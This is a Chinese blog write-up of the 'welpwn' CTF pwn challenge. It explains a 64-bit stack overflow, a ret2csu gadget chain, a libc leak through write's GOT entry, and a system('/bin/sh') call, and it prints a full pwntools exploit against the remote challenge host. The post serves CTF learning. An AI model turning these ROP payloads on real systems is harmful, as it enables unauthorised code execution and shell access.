攻防世界welpwn 通用gardet利用

最新推荐文章于 2022-03-27 14:46:34 发布
最新推荐文章于 2022-03-27 14:46:34 发布
阅读量181 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46521144/article/details/115704601
版权

welpwn

题目在攻防世界。

先查看一下保护,没有canary,用ida看一下程序流
在这里插入图片描述

这里很像是栈溢出,但没有溢出。

接着再看echo函数

在这里插入图片描述

稍微逆向一下可以发现的是,eval内部有一个数组,把之前读入的0x400字节的前16个放到s2中。但是遇到0就推出了

但是在64位系统中,是不能避免地址出现0的情况的。我们因此只能控制输入的第一个地址。因为第一个地址在小端法中是地址在前,0在后,因此可以被读入。这里感觉有点象是栈迁移的思路,好在这道题有别的方法,不用栈迁移这么复杂。

观察到echo是在main中被调用的,我们第一次输入的内容实际上是储存在main的栈帧中也存在一份。那么有没有可能,我们退回到上一个函数的栈帧中?但是由于在main中,我们一开始输入了长度为24的padding,这一部分需要跳过。

在gardet里面寻找能够产生4个以上pop的gardet(24+p64(该函数本身))容易想到可以用通用gardet,但是这里也有一个正好是四个的pop,

在这里插入图片描述

嗯其实他好像就是通用gardet…

好吧,那就通过这四个pop,吧一开始输入的a去除掉。接下来可以进行一般的rop,先泄露libc基址,在传入system这样的流程

这里看了网上的wp,看到了是用通用gardet的方法,就正好复习一下好久没用过的通用gardet,这里是源代码部分的原理

在这里插入图片描述

我们先进入地址0x40082a,之后ret到400810,可以看到正好把之前pop的几个参数友传递回rdx,rsi,edi这三个重要的寄存器。基本可以控制所有函数的参数。之后再一个call命令,正好到达我们想去的地址,好像正是为黑客准备的啊哈哈哈哈。输入参数时要注意以下规则。

在这里插入图片描述

这是为了call函数(0x400819这一步)以及寄存器取值。可以看ctf-all-in-one

好了,接下来构造payload1,泄露write地址

payload='a'*(16+8)+p64(pop_4_ret)+p64(pop_6_ret)+p64(0)+p64(1)+p64(write_got)+p64(0x8)+p64(write_got)+p64(1)+p64(part2)
payload+='aaaaaaaa'+'bbbbbbbb'+'cccccccc'+'dddddddd'+'eeeeeeee'+'ffffffff'+'gggggggg'+p64(main_addr)
# 最后这一行+=是因为上面那个通用gardet中0x400819call用完了t他还会pop一坨东西,要把这些东西去除,才能ret到正确地址
注意这里调用函数的时候是write_got!因为是call而不是ret,在已经绑定之后的write_got表中存放的是write的真实地址,如果写write_plt就不是call的作用了。

拿到write地址之后,libcSearcher寻找一下,就找到了。

之后就是找初始地址,找偏移,传system,不再赘述了

exp

from pwn import *
from LibcSearcher import *
# io=process('./welpwn')
io=remote('111.200.241.244',49896)
context.log_level='debug'
elf=ELF('./welpwn')


puts_addr=elf.plt['puts']
write_got=elf.got['write']
write_plt=elf.plt['write']
printf_got=elf.got['printf']

pop_rdi_ret = 0x00000000004008a3
pop_4_ret=0x000000000040089c
pop_6_ret=0x40089A
part2=0x400880
main_addr=0x4007CD



io.recvline()

# gdb.attach(io,"b *0x4007CB")

payload='a'*(16+8)+p64(pop_4_ret)+p64(pop_6_ret)+p64(0)+p64(1)+p64(write_got)+p64(0x8)+p64(write_got)+p64(1)+p64(part2)
payload+='aaaaaaaa'+'bbbbbbbb'+'cccccccc'+'dddddddd'+'eeeeeeee'+'ffffffff'+'gggggggg'+p64(main_addr)


io.sendline(payload)
write_addr = u64(io.recv(8))
libc=LibcSearcher('write',write_addr)
write_bias=libc.dump('write')
libc_base=write_addr-write_bias
print hex(write_addr)
system_addr=libc_base+libc.dump('system')
str_bin_sh = libc_base+libc.dump("str_bin_sh")

io.recvline()

payload='a'*(16+8)+p64(pop_4_ret)+p64(pop_rdi_ret)+p64(str_bin_sh)+p64(system_addr)



# gdb.attach(io,"b *0x4007CB")

io.sendline(payload)


io.interactive()

在这里插入图片描述

这题主要学到的就是,因为他是调用了内部的函数,比较巧的是这个函数的栈帧正好比较小,正好可以回到上一个函数的栈帧,然后再上一个函数的栈帧中rop,算是比较创新的。而且也就当复习了一下通用gardet的用法。

N1ch0l4s
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux usb gadget
festival的专栏
12-05 3377
上一篇谈到了usb host以及usb core,这一篇来介绍下usb gadget,usb gadget较usb host出现较晚,随着linux越来越用作嵌入式设备而出现,是一套独立的架构,与usb core没有任何关系。 由上图可以看出gadget架构有两个核心抽象层,composite framework和udc core。 composite framewor
pwn-内存泄漏one_gadget
leeham的博客
08-22 5785
pwn-内存泄漏/one_gadget 题目描述 题目可以下载到本地 https://github.com/LeeHaming/CTF-learn/blob/master/Caniso/Casino 解题思路 1.IDA分析函数逻辑 F5; 热键F5可以看到反汇编之后的程序逻辑;结合函数实际运行情况,可以得到这样的函数流程图: 此外我们可以找到修改mone...
PWN中的ROPgadget
LL021101的博客
03-27 3227
文章目录 前言 一、什么时候使用ROP,以及怎么使用 二、平衡栈帧 总结 前言 ROPgadget是一种基于代码复用的一种攻击技术。 一、ROP的使用(其中一种) 我们做pwn的时候,一般我们的目标是找到system函数和“/bin/sh”字符串,但是基本上pwn题是不会让你这么简单就解决了,他会隐藏system函数,和/bin/sh字符串,此时我们就要用到ROP方法。 ROPgadget --binary rop --only 'pop|ret' //单引号中间的...
roarctf_2019_realloc_magic 详细学习理解 无show()利用IO_FILE输出+realloc分配实现
weixin_46521144的博客
07-20 711
roarctf_2019_realloc_magic 这道题从头到尾都是我的知识盲区… 爆破,IO_FILE,realloc 学习资料 利用IO_FILE泄露libc原理 IO_FILE泄露libc例题 wp参考 realloc重要知识 静态分析 可以看出程序只有对realloc的调用操作,只有add()和delete()没有泄露函数。一般堆题如果没有show()函数,plt里面也没有system,可以采用的方法是劫持IO_FILE泄露。 IO_FILE劫持思路 对于劫持IO_FILE的思路,我的理解是
linux usb设备使用方法,Linux下USB从设备使用gadget API
weixin_29353431的博客
05-05 236
三、gadget API要了解gadget API,只需要理解头文件(usb_gadget.h)中几个重要的数据结构就可以了。详细的字段介绍看h文件注释。(1)struct usb_gadget {const struct usb_gadget_ops *ops;struct usb_ep *ep0;struct list_head ep_l...
linux交叉编译裁剪内核记录
abkzcyb5892的博客
03-02 81
刚开始学习嵌入式内核编译,因为要修改内核的默认配置,因此这里把自己的学习记录写下来,方便以后查阅,也给别人一个参考,有什么写的不对的或者更好的方法,请指正~ 开发板有usb从口,现在想要让开发板作为一款打印机设备来被PC机识别(因为以后要用此开发板作为一款一体打印机的主控板)但是内核默认提供的usb gadget设备驱动是大容量存储设备驱动(将默认编译好的内核下...
usb gadget
Never give up ,Hearts dream!
09-12 1356
1. 前言 2. 源码架构 3. 枚举过程 1. 前言 Gadget,小饰品。USB Gadget,就是指所开发的电子设备以USB从设备的模式通过USB连接到主机。比如手机用USB线插入PC后,手机就是USB Gadget。本文以Mavell为例,以Gadget插入主机的全过程为主线,分析USB Gadget的架构。   2. 源码架构 USB的源码位
usb gadget usb host数据传输
loveCY
07-14 3389
usb gadget usb host 数据传输 gadget driver gadget usb gadget
Ubuntu下的使用小技巧
踏实奋斗,追逐梦想
05-01 1697
1。如何去除开机自动弹出的“Enter password to unlock your login keyring”对话框? 在命令行输入seahorse, 这时会弹出一个Passwords and Keys的对话框,右击Passwords:login, 选择Change password, 旧密码输入登录密码,新密码为空。然后确定,重启电脑。 2. 如何去除“Authenticati
64位格式化字符串漏洞利用——axb_2019_fmt64
weixin_46521144的博客
03-23 2496
题目可在buuoj上找到,不知道为啥现在github怎么也上不去了,传不了题目 学了好多遍fmtstr了,感觉ctf这种学习就是。。。不学就会忘,不能停止做题目。。。 64位fmtstr和32位不同之处在于 1.传入地址可能存在0字符截断(32位由于字符数量少,可能没有这个问题) 2.修改地址可能产生%xc中x过大导致网络异常 就本题而言,会出现这两种情况 首先使用IDA容易看出,这里有格式化字符串漏洞,64位 使用一般方法确定偏移量 容易看出这是第八个参数 之后采用一般的got-hijack方法,泄露pu
rctf_2019_babyheap、0ctf_2018_heapstorm2学习(house of storm)
weixin_46521144的博客
09-10 1386
0ctf_2018_heapstorm2 这道题算是house of storm的起源。 house of storm的原理其实就是:结合利用largebin attack和劫持unsortedbin后一个chunk的bk,实现把堆地址写入到任意地址,再结合unsortedbin的bk指针分配时只检查size而不检查chunk完整性(这里有点疑惑,unlink检查应该很严格,可能是绕过了而不是没有检查)分配到这个地址上(add(0x48))实现的结果和unlink差不多。 具体利用条件: glibc2.3
PLT/GOT表在ctf pwn题目中的理解与运用 结合CSAPPchap7
weixin_46521144的博客
04-01 1313
由于之前没学过CSAPP第七章的时候,做pwn题时许多概念比如PLT表,GOT表,.BSS段这些概念都不很清楚,按照学长的方法照猫画虎也算是能做出来。如今学习的时候是带着当时的问题学完了这一章。因此做一个小总结,主要是对本章和pwn中关联度较大的部分做一个说明。 网上讲到和GOThijack相关的题目时,大多是推荐阅读CSAPP和连接相关的章节。如果你翻到了这篇文章,那你也就不用再学习原著了 ????当然,如果像更深入的了解,还是推荐CSAPP的。因为毕竟不能面面俱到,并且或许也会有理解错的地方。 理解
ciscn_2019_n_7(exit_hook)、wdb_2018_1st_babyheap(fsop的例子)
weixin_46521144的博客
09-08 1181
ciscn_2019_n_7 劫持exit_hook 这道题考察比较单一,劫持exit_hook即可 在ida里面看到,首先会在本地寻找一个log.txt,否则直接段错误。因此现在本地创建一个log.txt。写不写内容都可以。 接下来是exit_hook的位置 exit_hook的位置 在libc-2.23中 exit_hook = libc_base+0x5f0040+3848 exit_hook = libc_base+0x5f0040+3856 在libc-2.27中 exit_hook = lib
ciscn_2019_es_2 栈迁移(很好的例子)
weixin_46521144的博客
07-17 1181
ciscn_2019_es_2 一道很好的栈迁移例题。之前看合天讲的虽然也涉及到原理,但是例子用的是攻防世界pwn200,溢出长度还是有点多。这次只能溢出ebp和retaddr,就很典型并且有挑战性。这题没做出来,看的wp,希望下次能自己做出来。 题目给了两次溢出,这两次都是必要的。一般来说,第一次溢出需要泄露栈上地址用来给第二次做迁移使用,第二次执行栈迁移,控制ret跳转到我们所迁移的栈上,执行栈上填写的exp。由于第二次依然是在函数栈帧内输入,因此除非能自己read到bss上(通常能这样做的溢出空间也
pwn musl libc环境配置
weixin_46521144的博客
10-21 1096
pwn musl libc环境配置 上网找不到能看的资料,太惨了。还是自己看手册把。 原本是符号调试musl libc时碰到的困难,发现不知道怎么符号调试,后面询问别人看到要用dir命令。然后上网查发现并不能查到讲的清楚的。如果下面有写的有问题的,请大家指出。 gdb dir命令手册 起源 源文件在编译时其实不能携带源代码(好像确实,以前以为-g命令就会带上源代码的)而且源代码可能会移动,因此gdb需要一种方法寻找源代码文件的位置。gdb默认会有一个寻找源文件的列表叫做source path。 source
bss上格式化字符串处理【buuoj】SWPUCTF_2019_login
weixin_46521144的博客
08-10 1004
这道题用了两种方法去做,一种是修改got表,零一种是修改返回值控制执行流。 IDA分析 很明显的格式化字符串漏洞,但是是在bss段上 总结一下32位格式化字符串在bss段上的处理方法就是:寻找一个类似ebp的栈上寄存器,如下图 通过修改这个ebp,可以修改上图0xffc78f38的值为想要的(记住:格式化字符串修改栈上指针指向区域的地址,因此是0xffc78f38)如果想要劫持got表,寻找下面80开头的数据(和got表比较相关)修改完后就可以变成下图这样 (思考一下为什么要这么写:因为一般的格式化字符
2021dasctf七月赛 pwn题解复现(strdup,md5,protect,setcontext)
weixin_46521144的博客
08-09 910
前言:算是第一次参加自己觉得能力匹配的比赛之前的0ctf,tctf的,感觉自己就像个混子,2021国赛参加的时候全程都在学没学过的堆,所以其实也没觉得自己能力赶得上。然而第一次打比赛嘛,总归是不可能会做的,不过也算是知道了,比赛也没有想象中的那么恐怖。 本篇文章参考的wp https://kr0emer.com/2021/08/04/DASCTF%20July%20X%20CBCTF%204th%20pwn/ Easyheap 保护全开,也开了沙箱,但是同时也开了一块RWX的段,地址是固定的0x233300
[BUUCTF]PWN——[极客大挑战 2019]Not Bad详细解释
weixin_46521144的博客
03-25 743
从这道题可以学到shellcode的一般使用方法,和orw的一般方法 这道题开启了secure computing mood 使用seccomp看到可以使用的函数 使用vmmap查看哪里可以写shellcode IDA中也有看到使用vmmap开启了一段内存 这里mmap参数类型是(起始地址,大小,保护类,文件描述符等) 我们只需要关注保护类权限 PROT_READ是0x1 PROT_WRITE是0x2 PROT_EXEC是0x4 也就是read,write,execute的顺序,那么这里是6,也就是
buuoj [2020 新春红包题]3 2.29下unsortedbin attack的替代方法——Tcache Stashing
weixin_46521144的博客
08-09 646
IDA分析 seccomp只允许orw 程序没有开启canary,末尾有一个大小为0x10的溢出,可以构造栈迁移,栈迁移可以直接orw, 但是需要条件。 需要满足这里的backdoor chunk中的部分内容值大小要求。这里的backdoor chunk是程序一开始申请的chunk,我们不能正常写入,看到这里其实可以想到unsortedbin attack。但是程序是glibc2.29,没有unsorted bin attack 允许构造的chunk只能是0x10,0xf0,0x300,0x400 这道题

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值